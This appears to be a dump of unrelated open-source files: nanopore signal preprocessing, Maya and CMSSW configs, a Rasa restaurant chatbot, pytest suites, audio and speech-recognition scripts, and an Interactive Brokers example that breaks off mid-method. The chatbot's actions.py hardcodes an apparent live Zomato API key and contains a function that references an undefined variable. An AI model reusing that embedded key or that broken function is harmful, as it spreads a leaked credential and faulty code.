# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import pandas as pd
import numpy as np
import subprocess as sp
import tempfile
import shutil
import h5py
import glob
import sys
import os
from concurrent import futures
OUTPUT_DTYPE = np.float32
PAD_VALUE = -1000.
class TemporaryDirectory(object):
def __init__(self, root='.'):
self.root = root
self.path = None
def __enter__(self):
self.path = tempfile.mkdtemp(dir=self.root)
return self
def __exit__(self, type, value, traceback):
if self.path is not None:
shutil.rmtree(self.path)
def __str__(self):
return self.path
def all_files(self):
return sorted(glob.glob(os.path.join(self.path, 'part*')))
def merge_into_file(self, outfile):
infiles = self.all_files()
if infiles:
sp.check_call(['cat'] + infiles, stdout=outfile)
def normalize_signal(sig):
med = np.median(sig)
mad = np.median(np.abs(sig - med))
return (sig - med) / max(0.01, (mad * 1.4826))
def process(signal_file, signal_trim_length, output_path, read_ids):
with h5py.File(signal_file, 'r') as h5, open(output_path, 'wb') as arrayout:
sigbuf = []
siggroup = h5['adapter']
for read_id in read_ids:
signal = siggroup['{}/{}'.format(read_id[:3], read_id)][:]
if len(signal) < signal_trim_length:
signal = np.pad(normalize_signal(signal),
(signal_trim_length - len(signal), 0), 'constant',
constant_values=PAD_VALUE)
elif len(signal) > signal_trim_length:
signal = normalize_signal(signal[-signal_trim_length:])
else:
signal = normalize_signal(signal)
sigbuf.append(signal.astype(OUTPUT_DTYPE))
np.array(sigbuf).tofile(arrayout)
return len(read_ids)
def main(signal_file, signal_trim_length, catalog_input, output_file,
parallel=8, chunk_size=2000):
selreads = pd.read_table(catalog_input)
with futures.ProcessPoolExecutor(parallel) as executor, \
TemporaryDirectory() as tmpdir:
jobs = []
jobbases = np.arange(int(np.ceil(len(selreads) / chunk_size))) * chunk_size
for jobbase in jobbases:
job = executor.submit(process, signal_file, signal_trim_length,
'{}/part{:012d}'.format(tmpdir, jobbase),
selreads['read_id'].iloc[jobbase:jobbase+chunk_size].tolist())
jobs.append(job)
done = 0
for job in jobs:
done += job.result()
print('\r{:,} / {:,} files ({:.2f}%)'.format(
done, len(selreads), done / len(selreads) * 100), end='')
sys.stdout.flush()
print('\nMerging...')
tmpdir.merge_into_file(open('{}/merged'.format(tmpdir), 'wb'))
print('\nConverting...')
elementsize = signal_trim_length
arr = np.frombuffer(open('{}/merged'.format(tmpdir), 'rb').read(),
dtype=OUTPUT_DTYPE)
arr = arr.reshape(len(arr) // elementsize, elementsize)
np.save(output_file, arr)
if __name__ == '__main__':
# (signal_file, signal_trim_length, catalog_input,
# output_file, num_parallel) = (
# '../MXG3.1/adapter-dumps/inventory.h5', 350,
# '../tables/selected-signal-matches-MXG3.1.txt',
# 'tr.npy', 8)
(signal_file, signal_trim_length, catalog_input,
output_file, num_parallel) = sys.argv[1:]
signal_trim_length = int(signal_trim_length)
num_parallel = int(num_parallel)
main(signal_file, signal_trim_length, catalog_input, output_file,
num_parallel)
| 4,813 |
scripts/userSetup.py
|
robertjoosten/maya-orm
| 11 |
2170178
|
import logging
from maya.api import OpenMaya
log = logging.getLogger("mango")
def initialize(*args, **kwargs):
"""
The initialize function is a wrapper to the initialize function in the
mango. As it is possible the entire mango package to get reloaded the
import statement is done in the function itself.
"""
from mango import scene
scene.initialize()
def register_scene_callbacks():
"""
Register a scene callbacks that process the current scene when triggered.
The current scene will be read and all mango models initialized.
"""
OpenMaya.MSceneMessage.addCallback(OpenMaya.MSceneMessage.kAfterImport, initialize)
OpenMaya.MSceneMessage.addCallback(OpenMaya.MSceneMessage.kAfterOpen, initialize)
OpenMaya.MSceneMessage.addCallback(OpenMaya.MSceneMessage.kAfterCreateReference, initialize)
OpenMaya.MSceneMessage.addCallback(OpenMaya.MSceneMessage.kAfterLoadReference, initialize)
log.info("Scene callbacks registered.")
register_scene_callbacks()
| 1,020 |
Configuration/Eras/python/Era_Phase2C17I13M9_cff.py
|
PKUfudawei/cmssw
| 1 |
2169132
|
import FWCore.ParameterSet.Config as cms
from Configuration.Eras.Era_Phase2C11I13M9_cff import Phase2C11I13M9
from Configuration.Eras.Modifier_phase2_hgcalV12_cff import phase2_hgcalV12
from Configuration.Eras.Modifier_phase2_hgcalV16_cff import phase2_hgcalV16
Phase2C17I13M9 = cms.ModifierChain(Phase2C11I13M9.copyAndExclude([phase2_hgcalV12]),phase2_hgcalV16)
| 365 |
actions.py
|
aniketbangar/Rasa-Chatbot
| 0 |
2169953
|
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from rasa_sdk import Action
from rasa_sdk.events import SlotSet
import json
from flask_mail_send import send_email
import zomatopy
import pandas as pd
# Zomato Config start
config={"user_key":""} #Enter Zomato token
zomato = zomatopy.initialize_app(config)
# Zomato Config end
# Email Config start
def Config():
gmail_user = '' # Gmail Username
gmail_pwd = '' #APP Password
gmail_config = (gmail_user, gmail_pwd)
return gmail_config
# Email Config end
city_dict = ['Ahmedabad','Bangalore','Chennai','Delhi','Hyderabad','Kolkata','Mumbai','Pune','Agra','Ajmer',
'Aligarh','Allahabad','Amravati','Amritsar','Asansol','Aurangabad','Bareilly','Belgaum','Bhavnagar','Bhiwandi',
'Bhopal','Bhubaneswar','Bikaner','Bokaro Steel City','Chandigarh','Coimbatore','Cuttack','Dehradun','Dhanbad',
'Durg-Bhilai Nagar','Durgapur','Erode','Faridabad','Firozabad','Ghaziabad','Gorakhpur','Gulbarga','Guntur',
'Gurgaon','Guwahati‚ Gwalior','Hubli-Dharwad','Indore','Jabalpur','Jaipur','Jalandhar','Jammu','Jamnagar','Jamshedpur',
'Jhansi','Jodhpur','Kannur','Kanpur','Kakinada','Kochi','Kottayam','Kolhapur','Kollam','Kota','Kozhikode','Kurnool',
'Lucknow','Ludhiana','Madurai','Malappuram','Mathura','Goa','Mangalore','Meerut','Moradabad','Mysore','Nagpur','Nanded','Nashik',
'Nellore','Noida','Palakkad','Patna','Pondicherry','Raipur','Rajkot','Rajahmundry','Ranchi','Rourkela','Salem','Sangli','Siliguri',
'Solapur','Srinagar','Sultanpur','Surat','Thiruvananthapuram','Thrissur','Tiruchirappalli','Tirunelveli','Tiruppur','Ujjain','Vijayapura',
'Vadodara','Varanasi','Vasai-Virar City','Vijayawada','Visakhapatnam','Warangal']
city_dict = [x.lower() for x in city_dict]
cuisines_dict={'american': 1,'chinese': 25, 'north indian': 50, 'italian': 55, 'mexican': 73, 'south indian': 85, 'thai': 95}
class ActionSearchRestaurants(Action):
def name(self):
return 'action_restaurant'
def run(self, dispatcher, tracker, domain):
loc = tracker.get_slot('location')
cuisine = tracker.get_slot('cuisine')
price = tracker.get_slot('price')
global restaurants
print(loc, cuisine, price)
restaurants = zomatorRestoSearch(loc, cuisine, price)
top5 = restaurants.head(5)
# top 5 results to display
if len(top5)>0:
response = 'Showing you top results:' + "\n"
for index, row in top5.iterrows():
response = response + str(row["restaurant_name"]) + ' in ' + row['restaurant_address'] + ' has been rated ' + row['restaurant_rating'] +"\n"
# response = response + "\nShould i mail you the details"
dispatcher.utter_message(str(response))
return [SlotSet('result_found',True)]
else:
response = 'No restaurants found'
dispatcher.utter_message(str(response))
return [SlotSet('result_found',False)]
class SendMail(Action):
def name(self):
return 'email_restaurant_details'
def run(self, dispatcher, tracker, domain):
recipient = tracker.get_slot('email')
top10 = restaurants.head(10)
print("Sending email to {}".format(recipient))
send_email(recipient, top10)
dispatcher.utter_message("Sent. Bon Appetit!")
class Check_location(Action):
def name(self):
return 'action_check_location'
def run(self, dispatcher, tracker, domain):
loc = tracker.get_slot('location')
print("Check location",loc)
check= {'location_f' : 'notfound', 'location_new' : None}
config={"user_key":"f4924dc9ad672ee8c4f8c84743301af5"}
zomato = zomatopy.initialize_app(config)
location_detail=zomato.get_location(loc, 1)
location_json = json.loads(location_detail)
print(location_json)
if 'location_suggestions' in location_json:
location_results = len(location_json['location_suggestions'])
if location_results ==0:
check= {'location_f' : 'notfound', 'location_new' : None}
elif loc.lower() not in city_dict:
check= {'location_f' : 'tier3', 'location_new' : None}
else:
check= {'location_f' : 'found', 'location_new' : loc}
else:
check= {'location_f' : 'notfound', 'location_new' : None}
return [SlotSet('location',check['location_new']), SlotSet('location_found',check['location_f'])]
class Check_cuisine(Action):
def name(self):
return 'action_check_cuisine'
def run(self, dispatcher, tracker, domain):
cuisine = tracker.get_slot('cuisine')
print("Check Cusine",cuisine)
if key not in cuisines_dict:
return [SlotSet('cuisine_not_found',True)]
def zomatorRestoSearch(loc,cuisine,price):
location_detail=zomato.get_location(loc, 1)
location_json = json.loads(location_detail)
location_results = len(location_json['location_suggestions'])
lat=location_json["location_suggestions"][0]["latitude"]
lon=location_json["location_suggestions"][0]["longitude"]
city_id=location_json["location_suggestions"][0]["city_id"]
list1 = [0,20,40,60,80]
d = []
df = pd.DataFrame()
results = zomato.restaurant_search("", lat, lon, str(cuisines_dict.get(cuisine)))
d1 = json.loads(results)
# print("d1",d1)
d = d1['restaurants']
df1 = pd.DataFrame([{'restaurant_name': x['restaurant']['name'], 'restaurant_rating': x['restaurant']['user_rating']['aggregate_rating'],
'restaurant_address': x['restaurant']['location']['address'],'budget_for2people': x['restaurant']['average_cost_for_two'],
'restaurant_photo': x['restaurant']['featured_image'], 'restaurant_url': x['restaurant']['url'] } for x in d])
df = df.append(df1)
def budget_group(row):
if row['budget_for2people'] <300 :
return 'lesser than 300'
elif 300 <= row['budget_for2people'] <700 :
return 'between 300 to 700'
else:
return 'more than 700'
df['budget'] = df.apply(lambda row: budget_group (row),axis=1)
#sorting by review & filter by budget
restaurant_df = df[(df.budget == price)]
restaurant_df = restaurant_df.sort_values(['restaurant_rating'], ascending=0)
return restaurant_df
| 5,883 |
tests/tasks/github_stats/task_test.py
|
alysivji/busy-beaver
| 22 |
2168679
|
from typing import List
import pytest
from busy_beaver.adapters.slack import Channel
from busy_beaver.models import ApiUser
from busy_beaver.tasks.github_stats.task import (
start_post_github_summary_task,
fetch_github_summary_post_to_slack,
)
MODULE_TO_TEST = "busy_beaver.tasks.github_stats.task"
#######################
# Test Trigger Function
#######################
@pytest.fixture
def patched_background_task(patcher, create_fake_background_task):
return patcher(
MODULE_TO_TEST,
namespace=fetch_github_summary_post_to_slack.__name__,
replacement=create_fake_background_task(),
)
@pytest.mark.unit
def test_start_post_github_summary_task(
session, patched_background_task, create_api_user
):
"""Test trigger function"""
# Arrange
api_user = create_api_user("admin")
channel_name = "test-channel"
# Act
start_post_github_summary_task(api_user, channel_name)
# Assert
api_user = ApiUser.query.get(api_user.id)
task = api_user.tasks[0]
assert task.job_id == patched_background_task.id
assert task.data["channel_name"] == channel_name
assert "boundary_dt" in task.data
#####################
# Test Background Job
#####################
@pytest.fixture
def patched_slack(mocker, patcher):
class FakeSlackClient:
def __init__(self, *, channel_info):
self.mock = mocker.MagicMock()
if channel_info:
self.channel_info = channel_info
def get_channel_info(self, *args, **kwargs):
self.mock(*args, **kwargs)
return self.channel_info
def post_message(self, *args, **kwargs):
self.mock(*args, **kwargs)
return
def __repr__(self):
return "<FakeSlackClient>"
def _wrapper(*, channel_info=None):
obj = FakeSlackClient(channel_info=channel_info)
return patcher(MODULE_TO_TEST, namespace="slack", replacement=obj)
return _wrapper
@pytest.fixture
def patched_github_user_events(mocker, patcher):
class FakeGitHubUserEvents:
def __init__(self, *, summary_messages: List[str]):
self.mock = mocker.MagicMock(side_effect=list(summary_messages))
def generate_summary_text(self, *args, **kwargs):
return self.mock(*args, **kwargs)
def __call__(self, *args, **kwargs):
return self
def __repr__(self):
return "<FakeGitHubUserEvents>"
def _wrapper(*, messages=None):
obj = FakeGitHubUserEvents(summary_messages=messages)
return patcher(MODULE_TO_TEST, namespace="GitHubUserEvents", replacement=obj)
return _wrapper
@pytest.mark.unit
def test_fetch_github_summary_post_to_slack_with_no_users(
session, t_minus_one_day, patched_slack, patched_github_user_events
):
# Arrange
boundary_dt = t_minus_one_day
channel_info = Channel(name="general", id="idz", members=["user1", "user2"])
slack = patched_slack(channel_info=channel_info)
patched_github_user_events(messages=["a", "b"])
# Act
fetch_github_summary_post_to_slack("general", boundary_dt=boundary_dt)
# Assert
post_message_args = slack.mock.call_args_list[-1]
args, kwargs = post_message_args
assert "does it make a sound" in kwargs["message"]
assert "idz" in kwargs["channel_id"]
@pytest.mark.unit
def test_fetch_github_summary_post_to_slack_with_no_activity(
session, create_user, t_minus_one_day, patched_slack, patched_github_user_events
):
# Arrange
boundary_dt = t_minus_one_day
create_user(slack_id="user1", github_username="user1")
channel_info = Channel(name="general", id="idz", members=["user1", "user2"])
slack = patched_slack(channel_info=channel_info)
patched_github_user_events(messages=[""])
# Act
fetch_github_summary_post_to_slack("general", boundary_dt=boundary_dt)
# Assert
post_message_args = slack.mock.call_args_list[-1]
args, kwargs = post_message_args
assert "does it make a sound" in kwargs["message"]
@pytest.mark.unit
def test_fetch_github_summary_post_to_slack_with_activity(
session, create_user, t_minus_one_day, patched_slack, patched_github_user_events
):
# Arrange
boundary_dt = t_minus_one_day
create_user(slack_id="user1", github_username="user1")
create_user(slack_id="user2", github_username="user2")
channel_info = Channel(name="general", id="idz", members=["user1", "user2"])
slack = patched_slack(channel_info=channel_info)
patched_github_user_events(messages=["a", "b"])
# Act
fetch_github_summary_post_to_slack("general", boundary_dt=boundary_dt)
# Assert
post_message_args = slack.mock.call_args_list[-1]
args, kwargs = post_message_args
assert "ab" in kwargs["message"]
@pytest.mark.vcr()
@pytest.mark.freeze_time("2019-03-31")
@pytest.mark.integration
def test_post_github_summary_task__integration(
session, create_user, t_minus_one_day, patched_slack
):
channel_info = Channel(name="general", id="idz", members=["user1", "user2"])
slack = patched_slack(channel_info=channel_info)
create_user(slack_id="user1", github_username="alysivji")
# Act
fetch_github_summary_post_to_slack("general", boundary_dt=t_minus_one_day)
# Assert
post_message_args = slack.mock.call_args_list[-1]
args, kwargs = post_message_args
assert "<@user1>" in kwargs["message"]
| 5,426 |
examples/directivities/cardioid_function.py
|
Womac/pyroomacoustics
| 915 |
2168171
|
import numpy as np
import matplotlib.pyplot as plt
from pyroomacoustics import dB, all_combinations
from pyroomacoustics.directivities import cardioid_func
from pyroomacoustics.doa import spher2cart
azimuth = np.radians(np.linspace(start=0, stop=360, num=361, endpoint=True))
colatitude = np.radians(np.linspace(start=0, stop=180, num=180, endpoint=True))
lower_gain = -40
""" 2D """
# get cartesian coordinates
cart = spher2cart(azimuth=azimuth)
direction = spher2cart(azimuth=225, degrees=True)
# compute response
resp = cardioid_func(x=cart, direction=direction, coef=0.5, magnitude=True)
resp_db = dB(np.array(resp))
# plot
plt.figure()
plt.polar(azimuth, resp_db)
plt.ylim([lower_gain, 0])
ax = plt.gca()
ax.yaxis.set_ticks(np.arange(start=lower_gain, stop=5, step=10))
plt.tight_layout()
""" 3D """
# get cartesian coordinates
spher_coord = all_combinations(azimuth, colatitude)
cart = spher2cart(azimuth=spher_coord[:, 0], colatitude=spher_coord[:, 1])
direction = spher2cart(azimuth=0, colatitude=45, degrees=True)
# compute response
resp = cardioid_func(x=cart, direction=direction, coef=0.25, magnitude=True)
# plot (surface plot)
fig = plt.figure()
RESP_2D = resp.reshape(len(azimuth), len(colatitude))
AZI, COL = np.meshgrid(azimuth, colatitude)
X = RESP_2D.T * np.sin(COL) * np.cos(AZI)
Y = RESP_2D.T * np.sin(COL) * np.sin(AZI)
Z = RESP_2D.T * np.cos(COL)
ax = fig.add_subplot(1, 1, 1, projection="3d")
ax.plot_surface(X, Y, Z)
ax.set_xlabel("x")
ax.set_ylabel("y")
ax.set_zlabel("z")
ax.set_xlim([-1, 1])
ax.set_ylim([-1, 1])
ax.set_zlim([-1, 1])
plt.show()
| 1,583 |
speech_recognition/run/inference.py
|
cosmoquester/speech-recognition
| 6 |
2170098
|
import argparse
import csv
import sys
from functools import partial
import tensorflow as tf
import tensorflow_text as text
import yaml
from ..configs import DataConfig, get_model_config
from ..data import delta_accelerate, load_audio_file
from ..models import LAS, DeepSpeech2
from ..search import DeepSpeechSearcher, LAS_Searcher
from ..utils import get_device_strategy, get_logger
# fmt: off
parser = argparse.ArgumentParser("This is script to inferece (generate sentence) with seq2seq model")
parser.add_argument("--data-config", type=str, required=True, help="data processing config file")
parser.add_argument("--model-config", type=str, required=True, help="model config file")
parser.add_argument("--audio-files", required=True, help="an audio file or glob pattern of multiple files ex) *.pcm")
parser.add_argument("--model-path", type=str, required=True, help="pretrained model checkpoint")
parser.add_argument("--output-path", default="output.tsv", help="output tsv file path to save generated sentences")
parser.add_argument("--sp-model-path", type=str, required=True, help="sentencepiece model path")
parser.add_argument("--batch-size", type=int, default=512)
parser.add_argument("--beam-size", type=int, default=0, help="not given, use greedy search else beam search with this value as beam size")
parser.add_argument("--mixed-precision", action="store_true", help="Use mixed precision FP16")
parser.add_argument("--device", type=str, default="CPU", help="device to train model")
# fmt: on
def main(args: argparse.Namespace):
strategy = get_device_strategy(args.device)
logger = get_logger("inference")
if args.mixed_precision:
mixed_type = "mixed_bfloat16" if args.device == "TPU" else "mixed_float16"
policy = tf.keras.mixed_precision.experimental.Policy(mixed_type)
tf.keras.mixed_precision.experimental.set_policy(policy)
logger.info("[+] Use Mixed Precision FP16")
# Construct Dataset
with tf.io.gfile.GFile(args.sp_model_path, "rb") as f:
tokenizer = text.SentencepieceTokenizer(f.read(), add_bos=True, add_eos=True)
bos_id, eos_id = tokenizer.tokenize("").numpy().tolist()
dataset_files = sorted(tf.io.gfile.glob(args.audio_files))
if not dataset_files:
logger.error("[Error] Dataset path is invalid!")
sys.exit(1)
# Load Config
logger.info(f"Load Data Config from {args.data_config}")
config = DataConfig.from_yaml(args.data_config)
with strategy.scope():
dataset = (
tf.data.Dataset.from_tensor_slices(dataset_files)
.map(load_audio_file(config.sample_rate, config.file_format, config.sample_rate))
.map(config.audio_feature_fn, num_parallel_calls=tf.data.experimental.AUTOTUNE)
)
# Delta Accelerate
if config.use_delta_accelerate:
logger.info("[+] Use delta and deltas accelerate")
dataset = dataset.map(delta_accelerate)
dataset = dataset.padded_batch(args.batch_size, [None, config.frequency_dim, config.feature_dim]).prefetch(
tf.data.experimental.AUTOTUNE
)
# Model Initialize & Load pretrained model
model_config = get_model_config(args.model_config)
model = model_config.create_model()
model_input, _ = model.make_example(
tf.keras.Input([None, config.frequency_dim, config.feature_dim], dtype=tf.float32),
tf.keras.Input([None], dtype=tf.int32),
)
model(model_input)
tf.train.Checkpoint(model).restore(args.model_path).expect_partial()
logger.info(f"Loaded weights of model from {args.model_path}")
model.summary()
if isinstance(model, LAS):
searcher = LAS_Searcher(model, config.max_token_length, bos_id, eos_id, model_config.pad_id)
elif isinstance(model, DeepSpeech2):
searcher = DeepSpeechSearcher(model, model_config.blank_index)
# Inference
logger.info("Start Inference")
outputs = []
for batch_input in dataset:
if args.beam_size > 0:
batch_output = searcher.beam_search(batch_input, args.beam_size)
batch_output = batch_output[0][:, 0, :].numpy()
else:
batch_output = searcher.greedy_search(batch_input)[0].numpy()
outputs.extend(batch_output)
outputs = [tokenizer.detokenize(output).numpy().decode("UTF8") for output in outputs]
logger.info("Ended Inference, Start to save...")
# Save file
with open(args.output_path, "w") as fout:
wtr = csv.writer(fout, delimiter="\t")
wtr.writerow(["AudioPath", "DecodedSentence"])
for audio_path, decoded_sentence in zip(dataset_files, outputs):
wtr.writerow((audio_path, decoded_sentence))
logger.info(f"Saved (audio path,decoded sentence) pairs to {args.output_path}")
if __name__ == "__main__":
sys.exit(main(parser.parse_args()))
| 5,002 |
src/notes_app/forms.py
|
oussamabouchikhi/Notize
| 1 |
2169705
|
from django import forms
from .models import Note
from ckeditor.widgets import CKEditorWidget
class NoteForm(forms.ModelForm):
content = forms.CharField(widget=CKEditorWidget())
class Meta:
model = Note
fields = ['title', 'content', 'tags']
| 266 |
{{cookiecutter.project_slug}}/backend/app/app/api/api_v1/endpoints/utils.py
|
tonyf/full-stack-fastapi-postgresql
| 0 |
2169738
|
from typing import Any
from fastapi import APIRouter, Depends
from pydantic.networks import EmailStr
from app import models, schemas
from app.api import deps
from app.core.celery_app import celery_app
from app.utils import send_test_email
router = APIRouter()
@router.post("/test-celery/", response_model=schemas.Msg, status_code=201)
def test_celery(
msg: schemas.Msg,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Test Celery worker.
"""
celery_app.send_task("app.worker.test_celery", args=[msg.msg])
return {"msg": "Word received"}
@router.post("/test-email/", response_model=schemas.Msg, status_code=201)
def test_email(
email_to: EmailStr,
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
"""
Test emails.
"""
send_test_email(email_to=email_to)
return {"msg": f"Test email sent to {email_to}"}
@router.post("/test/sentry", response_model=schemas.Msg, status_code=500)
def test_sentry(
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
raise Exception("Test Exception")
@router.post("/test/posthog", response_model=schemas.Msg, status_code=200)
def test_posthog(
current_user: models.User = Depends(deps.get_current_active_superuser),
) -> Any:
from app.services.posthog import PosthogClient
posthog = PosthogClient().get_client()
posthog.capture("test-id", "test-event")
return {"msg": f"Test event created"}
| 1,517 |
restfulpy/tests/test_validation_filter.py
|
maryayi/restfulpy
| 1 |
2169972
|
import copy
import unittest
from nanohttp import context, json, settings
from restfulpy.principal import DummyIdentity
from restfulpy.testing import WebAppTestCase
from restfulpy.tests.helpers import MockupApplication
from restfulpy.validation import validate_form
from restfulpy.controllers import RestController, RootController
class ValidationFilterController(RestController):
@json
@validate_form(
filter_=['filteredParamForAll'],
client=dict(filter_=['filteredParamForClient']),
admin=dict(filter_=['filteredParamForAdmin'])
)
def post(self):
result = copy.deepcopy(context.form)
result.update(context.query_string)
return result
class Root(RootController):
validation = ValidationFilterController()
class ValidationFilterTestCase(WebAppTestCase):
application = MockupApplication('MockupApplication', Root())
@classmethod
def configure_app(cls):
super().configure_app()
settings.merge("""
logging:
loggers:
default:
level: info
""")
def test_validation_filter(self):
# Test `filter`
# role -> All
self.wsgi_app.jwt_token = DummyIdentity().dump().decode()
result, ___ = self.request(
'All', 'POST', '/validation', doc=False,
params={
'customParam': 'param',
'filteredParamForAll': 'param',
'filteredParamForClient': 'param',
'filteredParamForAdmin': 'param',
}
)
self.assertNotIn('customParam', result)
self.assertNotIn('filteredParamForClient', result)
self.assertNotIn('filteredParamForAdmin', result)
self.assertIn('filteredParamForAll', result)
# -----------------------------
# role -> Client
self.wsgi_app.jwt_token = DummyIdentity('client').dump().decode()
result, ___ = self.request(
'Client', 'POST', '/validation', doc=False,
params={
'customParam': 'param',
'filteredParamForAll': 'param',
'filteredParamForClient': 'param',
'filteredParamForAdmin': 'param',
}
)
self.assertNotIn('customParam', result)
self.assertIn('filteredParamForClient', result)
self.assertNotIn('filteredParamForAdmin', result)
self.assertIn('filteredParamForAll', result)
# -----------------------------
# role -> Admin
self.wsgi_app.jwt_token = DummyIdentity('admin').dump().decode()
result, ___ = self.request(
'Admin', 'POST', '/validation', doc=False,
params={
'customParam': 'param',
'filteredParamForAll': 'param',
'filteredParamForClient': 'param',
'filteredParamForAdmin': 'param',
}
)
self.assertNotIn('customParam', result)
self.assertNotIn('filteredParamForClient', result)
self.assertIn('filteredParamForAdmin', result)
self.assertIn('filteredParamForAll', result)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| 3,234 |
hytra/jst/classifiertrainingexampleextractor.py
|
ilastik/hytra
| 1 |
2169758
|
"""
Provide methods to find positive and negative training examples from a hypotheses graph and
a ground truth mapping, in the presence of multiple competing segmentation hypotheseses.
"""
import logging
import numpy as np
import attr
from hytra.core.random_forest_classifier import RandomForestClassifier
logger = logging.getLogger(__name__)
def trainDetectionClassifier(
hypothesesGraph,
gtFrameIdToGlobalIdsWithScoresMap,
numSamples=100,
selectedFeatures=None,
):
"""
Finds the given number of training examples, half as positive and half as negative examples, from the
given graph and mapping.
Positive examples are those with the highest jaccard score, while negative examples can either
just not be the best match for a GT label, or also be not matched at all.
**Returns**: a trained random forest
"""
# create a list of all elements, sort them by their jaccard score, then pick from both ends?
logger.debug("Extracting candidates")
# create helper class for candidates, and store a list of these
@attr.s
class Candidate(object):
"""Helper class to combine a hytpotheses graph `node` and its `score` to find the proper samples for classifier training"""
node = attr.ib()
score = attr.ib(validator=attr.validators.instance_of(float))
candidates = []
nodeTraxelMap = hypothesesGraph.getNodeTraxelMap()
for node in hypothesesGraph.nodeIterator():
if "JaccardScores" in nodeTraxelMap[node].Features and len(nodeTraxelMap[node].Features["JaccardScores"]) > 0:
globalIdsAndScores = nodeTraxelMap[node].Features["JaccardScores"]
globalIdsAndScores = sorted(globalIdsAndScores, key=lambda x: x[1])
bestScore = globalIdsAndScores[-1][1]
candidates.append(Candidate(node, bestScore))
assert len(candidates) >= numSamples
candidates.sort(key=lambda x: x.score)
# pick the first and last numSamples/2, and extract their features?
# use RandomForestClassifier's method "extractFeatureVector"
selectedSamples = candidates[0 : numSamples // 2] + candidates[-numSamples // 2 - 1 : -1]
labels = np.hstack([np.zeros(numSamples // 2), np.ones(numSamples // 2)])
logger.info("Using {} of {} available training examples".format(numSamples, len(candidates)))
# TODO: make sure that the positive examples were all selected in the GT mapping
logger.debug("construct feature matrix")
node = selectedSamples[0].node
if selectedFeatures is None:
selectedFeatures = nodeTraxelMap[node].Features.keys()
forbidden = [
"JaccardScores",
"id",
"filename",
"Polygon",
"detProb",
"divProb",
"com",
]
forbidden += [f for f in selectedFeatures if f.count("_") > 0]
for f in forbidden:
if f in selectedFeatures:
selectedFeatures.remove(f)
logger.info("No list of selected features was specified, using {}".format(selectedFeatures))
rf = RandomForestClassifier(selectedFeatures=selectedFeatures)
features = rf.extractFeatureVector(nodeTraxelMap[node].Features, singleObject=True)
featureMatrix = np.zeros([len(selectedSamples), features.shape[1]])
featureMatrix[0, :] = features
for idx, candidate in enumerate(selectedSamples[1:]):
features = rf.extractFeatureVector(nodeTraxelMap[candidate.node].Features, singleObject=True)
featureMatrix[idx + 1, :] = features
rf.train(featureMatrix, labels)
return rf
| 3,595 |
Examples/10_securityAnalysis.py
|
darwinex/darwinex-ibkr
| 2 |
2169263
|
# Installing (source activate ENVIRONMENT):
# Cd to: cd ~/Desktop/Darwinex/darwinex-ibkr/TWS_API/twsapi_macunix.976.01/IBJts/source/pythonclient/
# Do: python3 setup.py bdist_wheel
# Do: python3 -m pip install --user --upgrade dist/ibapi-9.76.1-py3-none-any.whl
from ibapi.client import EClient
from ibapi.wrapper import EWrapper
from ibapi.contract import Contract, ContractDetails
from ibapi.order import Order
from ibapi.order_state import OrderState
from ibapi.execution import Execution, ExecutionFilter
from ibapi.common import BarData
from dataclasses import dataclass, fields, astuple
import pandas as pd
import threading, logging, time
logging.basicConfig(level=logging.INFO,
format='%(asctime)s.%(msecs)03d %(levelname)s <> %(funcName)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
#######################################
@dataclass
class BarDataNew:
date: str = ''
open: float = 0.0
high: float = 0.0
low: float = 0.0
close: float = 0.0
volume: int = 0
average: float = 0.0
barCount: int = 0
class AlphaApp(EWrapper, EClient):
def __init__(self):
self.logger = logging.getLogger(__name__)
EClient.__init__(self, wrapper=self)
###########################################################
def error(self, reqId: int, errorCode: int, errorString: str):
'''This event is called when there is an error with the
communication or when TWS wants to send a message to the client.'''
self.logger.error(f'reqId: {reqId} / Code: {errorCode} / Error String: {errorString}')
def contractDetails(self, reqId: int, contractDetails: ContractDetails):
'''Receives the full contract's definitions. This method will return all
contracts matching the requested via EEClientSocket::reqContractDetails.'''
self.logger.info(f'contractDetails: {contractDetails}')
def openOrder(self, orderId: int,
contract: Contract,
order: Order,
orderState: OrderState):
'''This function is called to feed in open orders.'''
self.logger.info(f'orderId: {orderId} / contract: {contract} / order: {order} / orderState: {orderState}')
def orderStatus(self, orderId: int,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float):
'''This event is called whenever the status of an order changes. It is
also fired after reconnecting to TWS if the client has any open orders.'''
self.logger.info(f'orderId: {orderId} / status: {status} / filled: {filled} / remaining: {remaining} / avgFillPrice: {avgFillPrice} / clientId: {clientId}')
def execDetails(self, reqId: int,
contract: Contract,
execution: Execution):
'''This event is fired when the reqExecutions() functions is
invoked, or when an order is filled.'''
self.logger.info(f'contract: {contract} / execution: {execution}')
def position(self, account: str,
contract: Contract,
position: float,
avgCost: float):
'''This event returns real-time positions for all accounts in
response to the reqPositions() method.'''
self.logger.info(f'contract: {contract} / position: {position} / avgCost: {avgCost}')
def accountSummary(self, reqId: int,
account: str,
tag: str,
value: str,
currency: str):
'''Returns the data from the TWS Account Window Summary tab in
response to reqAccountSummary().'''
self.logger.info(f'reqId: {reqId} / account: {account} / tag: {tag} / value: {value} / currency: {currency}')
def historicalData(self, reqId: int,
bar: BarData):
'''Returns the requested historical data bars.
reqId - the request's identifier
date - the bar's date and time (either as a yyyymmss hh:mm:ssformatted
string or as system time according to the request)
open - the bar's open point
high - the bar's high point
low - the bar's low point
close - the bar's closing point
volume - the bar's traded volume if available
count - the number of trades during the bar's timespan (only available
for TRADES).
WAP - the bar's Weighted Average Price
hasGaps -indicates if the data has gaps or not.'''
self.logger.info(f'reqId: {reqId} / bar: {bar}')
self.historicalDataContainer.append(BarDataNew(**bar.__dict__))
def historicalDataEnd(self, reqId:int,
start:str,
end:str):
'''Marks the ending of the historical bars reception.'''
self.logger.info(f'reqId: {reqId} / start: {start} / end: {end}')
# Print the data:
df = self._convertDataToDataFrame(self.historicalDataContainer)
self.logger.info(df)
# Make some calculations:
self.makeSomeCalculations(df)
def _convertDataToDataFrame(self, data: list) -> pd.DataFrame:
